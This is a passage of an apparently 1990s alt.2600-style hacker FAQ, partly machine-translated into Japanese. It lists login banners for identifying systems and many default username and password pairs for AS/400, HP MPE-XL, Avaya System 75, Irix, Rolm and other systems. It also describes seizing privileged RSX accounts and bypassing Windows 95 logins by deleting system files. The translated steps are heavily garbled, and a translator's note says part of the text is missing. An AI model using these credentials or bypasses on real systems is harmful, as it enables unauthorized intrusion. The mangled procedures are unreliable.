MMM MMM MMM MMM
MMM MMM MMM MMM
MMM MMM MMM MMM
MMM MMM MMM MMM
MMM MMM MMM MMM
Copyright (c) Northern
Telecom, 1991
Novell ONLAN
~~~~~~~~~~~~
N
[ONLAN/PCのコピーを所有することは,システムをアクセスするのが最良だ。]
PC-Anywhere
~~~~~~~~~~~
P
[PCAnywhereの遠いコピーを所有することは,システムをアクセスするのが最良だ。]
PRIMOS
~~~~~~
PRIMENET 19.2.7F PPOA1
<any text>
ER!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
CONNECT
Primenet V 2.3 (system)
LOGIN (you)
User id? (system)
SAPB5 (you)
Password? (system)
DROWSAP (you)
OK, (system)
ROLM CBX II
~~~~~~~~~~~
ROLM CBXII RELEASE 9004.2.34 RB295 9000D IBMHO27568
BIND DATE: 7/APR/93
COPYRIGHT 1980, 1993 ROLM COMPANY. ALL RIGHTS RESERVED.
ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM COMPANY.
YOU HAVE ENTERED CPU 1
12:38:47 ON WEDNESDAY 2/15/1995
USERNAME: op
PASSWORD:
INVALID USERNAME-PASSWORD PAIR
ROLM-OSL
~~~~~~~~
MARAUDER10292 01/09/85(^G) 1 03/10/87 00:29:47
RELEASE 8003
OSL, PLEASE.
?
System75
~~~~~~~~
Login: root
INCORRECT LOGIN
Login: browse
Password:
Software Version: G3s.b16.2.2
Terminal Type (513, 4410, 4425): [513]
Tops-10
~~~~~~~
NIH Timesharing
NIH Tri-SMP 7.02-FF 16:30:04 TTY11
system 1378/1381/1453 Connected to Node Happy(40) Line # 12
Please LOGIN
.
VM/370
~~~~~~
VM/370
!
VM/ESA
~~~~~~
VM/ESA ONLINE
TBVM2 VM/ESA Rel 1.1 PUT
9200
Fill in your USERID and PASSWORD and press ENTER
(Your password will not appear when you type it)
USERID ===>
PASSWORD ===>
COMMAND ===>
Xylogics Annex Communications Server
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Annex Command Line Interpreter * Copyright 1991 Xylogics, Inc.
Checking authorization, Please wait...
Annex username: TNO
Annex password:
Permission granted
annex:
23. デフォルトが何であり,XXXの理由を説明するか?
AIX
~~~
guest guest
AS/400
~~~~~~
qsecofr qsecofr /* master security officer */
qsysopr qsysopr /* system operator */
qpgmr qpgmr /* default programmer */
also
ibm password
ibm 2222
ibm service
qsecofr 1111111
qsecofr 2222222
qserv qserv
qsvr qsvr
secofr secofr
DECserver
~~~~~~~~~
ACCESS
SYSTEM
Dynix (The library software, not the UnixOS)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(Type 'later' to exit to the login prompt)
setup <no password>
library <no password>
circ <9 digit number>
Hewlett Packard MPE-XL
~~~~~~~~~~~~~~~~~~~~~~
HELLO MANAGER.SYS
HELLO MGR.SYS
HELLO FIELD.SUPPORT HPUNSUP or SUPPORT or HP
HELLO OP.OPERATOR
MGR CAROLIAN
MGR CCC
MGR CNAS
MGR CONV
MGR COGNOS
OPERATOR COGNOS
MANAGER COGNOS
OPERATOR DISC
MGR HPDESK
MGR HPWORD
FIELD HPWORD
MGR HPOFFICE
SPOOLMAN HPOFFICE
ADVMAIL HPOFFICE
MAIL HPOFFICE
WP HPOFFICE
MANAGER HPOFFICE
MGR HPONLY
FIELD HPP187
MGR HPP187
MGR HPP189
MGR HPP196
MGR INTX3
MGR ITF3000
MANAGER ITF3000
MAIL MAIL
MGR NETBASE
MGR REGO
MGR RJE
MGR ROBELLE
MANAGER SECURITY
MGR SECURITY
FIELD SERVICE
MANAGER SYS
MGR SYS
PCUSER SYS
RSBCMON SYS
OPERATOR SYS
OPERATOR SYSTEM
FIELD SUPPORT
OPERATOR SUPPORT
MANAGER TCH
MAIL TELESUP
MANAGER TELESUP
MGR TELESUP
SYS TELESUP
MGE VESOFT
MGE VESOFT
MGR WORD
MGR XLSERVER
Common jobs are Pub, Sys, Data
Common passwords are HPOnly, TeleSup, HP, MPE, Manager, MGR, Remote
Major BBS
~~~~~~~~~
Sysop Sysop
Mitel PBX
~~~~~~~~~
SYSTEM
NeXTSTEP
~~~~~~~~
root NeXT
signa signa
Nomadic Computing Environment (NCE) on the Tadpole Technologies
SPARCBook3
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
fax <no password>
PICK O/S
~~~~~~~~
DSA # Desquetop System Administrator
DS
DESQUETOP
PHANTOM
Prolog
~~~~~~
PBX PBX
NETWORK NETWORK
NETOP <null>
Radio Shack Screen Savers
~~~~~~~~~~~~~~~~~~~~~~~~~
RS<STORE_ID_NUMBER>
Rolm
~~~~
CBX Defaults
op op
op operator
su super
admin pwp
eng engineer
PhoneMail Defaults
sysadmin sysadmin
tech tech
poll tech
RSX
~~~
SYSTEM/SYSTEM (Username SYSTEM, Password SYSTEM)
1,1/system (Directory [1,1] Password SYSTEM)
BATCH/BATCH
SYSTEM/MANAGER
USER/USER
Default accounts for Micro/RSX:
MICRO/RSX
交互にあなたは<CTRL-Z>を打つことができる。
いつブーツ連続があなたに日付を求めるかは,使っているアカウントを作り出す。
RUN ACNT
or RUN $ACNT
(10の{oct}より下の数} Privelegedされている。)
再ブーツは,date/time質問を待つ。MCRプロンプト(タイプ"aboat.")
のタイプ;
あなたはドットを含んでいなければならない。
これは,タイプ"acslb0:/blks=1000"を働かせる。
いくらかを得ることが新しいステップスペースをそう交換し,割り込まないだろう。
タイプ"
$acnt"を走らせなさい。
そして,7もっと少なくのグループ数のいくらかのアカウントのパスワードを変えなさい。
あなたは,^Cが働かないことが分かるかもしれない。その上とESCを試しなさい。
また,有効で,無効の時間までにターミネータとしてすべての3を試しなさい。
システムを停止させるために以上の仕事のどれも,停止スイッチを無効のdate-time
だけのあと使わない。1つのユーザモードPSW[4-7]xxxxを捜しなさい。
そのときR6の中へ177777を置きなさい,書きあなたの十字架指がドライブ
を保護し,システムを続ける。希望をもってこれは,間接的に爆発して帰着するだろう。
... そして希望をもってシステムは十分に保障されていない。
c ya
the
鷹 ----------------- Sysadmin alt.2600|
仲裁者 -----------------
SGI Irix
~~~~~~~~
4DGifts <no password>
guest <no password>
demos <no password>
lp <no password>
nuucp <no password>
tour <no password>
tutor <no password>
System 75
~~~~~~~~~
bcim bcimpw
bciim bciimpw
bcms bcmspw, bcms
bcnas bcnspw
blue bluepw
browse looker, browsepw
craft crftpw, craftpw, crack
cust custpw
enquiry enquirypw
field support
inads indspw, inadspw, inads
init initpw
kraft kraftpw
locate locatepw
maint maintpw, rwmaint
nms nmspw
rcust rcustpw
support supportpw
tech field
Taco Bell
~~~~~~~~~
rgm rollout
tacobell <null>
Verifone Junior 2.05
~~~~~~~~~~~~~~~~~~~~
Default password: 166816
VMS
~~~
field service
systest utep
XON / XON Junior
~~~~~~~~~~~~~~~~
Default password: 166831
24. 何,ポートXXXはであるか?
大部分のUNIX機械の上のファイル/etc/servicesは,その機械のためのポート
割り当てをリストにする。
ポート割り当ての総目録にとってRFC1700 (コメントのための要求)を読みなさい。
"は,Numbers"を;Assignedした。
(訳注)以下37までなくしました(泣)。で電話系とかを省きwin95に突入。
WINDOZ 95 SECTION WINDOZ 95 SECTION
------------------------------------------------------------
1.どうやって Win95のパスワードファイルをハックするか
windows95がパスワードで保護した領域にアクセスするには、windows のシステム
ディレクトリの systray(訳注:systray.Exe) と呼ばれるファイルを消さなくては
ならない。このファイルはログイン時のパスワード処理を行う。次に消すファイル
はパスワードをベリファイするファイルだ。windowsディレクトリの wininit.exe
でこれを消し再スタートすると、パスワードは何でも受け付け、そこにはセキュリ
ティは存在しない。
2. IPアドレスの設定 / ゲートウェイ その他
windoz95で動くPCにIPアドレスを与えるには単に、コントロールパネルから
ネットワークを選ぶと様々なネットワークプロトコルを追加できる。また、シス
テム名つけることができる。I‘アドレスやゲートウェイ、DNSを調べられる。
まず最初に「追加」をクリックする。追加するクライアント、アダプタ、サービス
やプロトコルを聞いてくるので、プロトコルを選んでクリックする。左のウィンド
ウで Microsoft、右のウインドウで TCP/IP を選ぶ。TCP/IP を追加したらマシンを
リスタートする。再びコントロールパネルのネットワークに戻り、TCP/IP をクリッ
クし、プロパティボタンをクリックすると別のウィンドウが開き、たくさんの項目が
現れる。IPアドレスを選び正確にIPアドレスを入力する。サブネット・マスクは
通常 255.255.255.0 を使う。
次に「DNS設定」をクリックする。「DNSを使う」を選び自分のホスト名、を host に
プロバイダのドメイン名を「ドメイン」に入力する。次にドメインマシンのIPアドレス
を追加する。プロバイダは普通2つにドメインマシンを持っている。その両方を入力す
る。
最後に[OK」を2回クリックしてネットワーク・コントロールパネルに戻るとマシン
をリスタートするか聞かれる。リスタートすると変更が有効になる。
3. win 95でインターネットに接続するには
win95でインターネットに接続するには、単にスタートメニューのプログラムを選び、
アクセサリーの中のダイヤルアップネットワークを選ぶ。別のウィンドウが開くので、
新しい接続をクリックする。ここにアクセスプロバイダをセットする。